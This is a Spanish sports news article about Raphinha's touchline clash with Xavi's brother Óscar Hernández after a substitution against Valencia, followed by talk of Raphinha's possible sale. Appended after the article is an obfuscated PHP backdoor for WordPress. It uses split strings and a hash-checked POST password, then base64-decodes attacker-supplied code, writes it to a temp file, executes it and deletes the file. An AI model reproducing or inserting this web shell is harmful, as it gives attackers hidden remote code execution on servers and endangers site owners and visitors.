Más trapos sucios: rifirrafe de Raphinha con el hermano de Xavi

Según ha desvelado el programa ‘Jijantes’ y ha confirmado AS, al delantero brasileño no le sentó bien su cambio frente al Valencia y se dirigió con muy malas formas al ayudante de Xavi.

No hay duda de que cada día que pasa se hace más irrespirable la situación de Xavi Hernández dentro del FC Barcelona. Este mismo sábado, el programa dirigido por Gerard Romero, ‘Jijantes’, ha desvelado un enfrentamiento entre Raphinha y el ayudante de Xavi durante el partido contra el Valencia en Montjuïc del pasado 29 de abril. El momento exacto fue cuando Xavi decidió sustituir en el minuto 66 al atacante ‘canarinho’ para dar entrada a Joao Félix: el equipo estaba empatando 2-2, por lo que Raphinha consideró que se le estaba señalando como el responsable. Cuando se dirigía al banquillo y viendo cómo el hermano de Xavi se le acercaba, fue cuando decidió sacar todo lo que llevaba dentro.

Un conflicto que generó mucha tensión en el vestuario: el delantero brasileño tuvo sus más y sus menos con Óscar Hernández, según pudo confirmar también AS. En el fragor de la batalla, Raphinha llegó a escuchar como le dejaban muy claro que no iba a ser titular en la siguiente jornada. “Tranquilo, ahora no jugarás”.

Desde dentro del vestuario confirman en toda su extensión los hechos relatados en ‘Jijantes’, aunque tratan de justificar que se debió al “calentón del momento” y que la relación entre Raphinha y el ayudante de Xavi es “correcta”. Sin embargo, lo cierto es que al final se acabó cumpliendo la amenaza, y el brasileño ‘chupó’ banquillo en Montilivi hasta el minuto 69, cuando entró al campo por Fermín López. En ese momento el Barcelona ya iba por debajo en el marcador, perdiendo 3-2.

No hay que olvidar que Raphinha sabe desde hace tiempo que su nombre está circulando en el mercado, porque el club lo considera un jugador con cartel en la Premier. El problema a la hora de plantear su salida es que el precio mínimo sería de unos 65 millones de euros, teniendo en cuenta que todavía faltan unos 40 millones por amortizar. Además, su vinculación directa con el actual director deportivo, Deco, que era su agente en el momento del traspaso, también es un factor a tener en cuenta a la hora del interés de la entidad en desprenderse del brasileño para intentar disipar cualquier duda sobre la operación.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}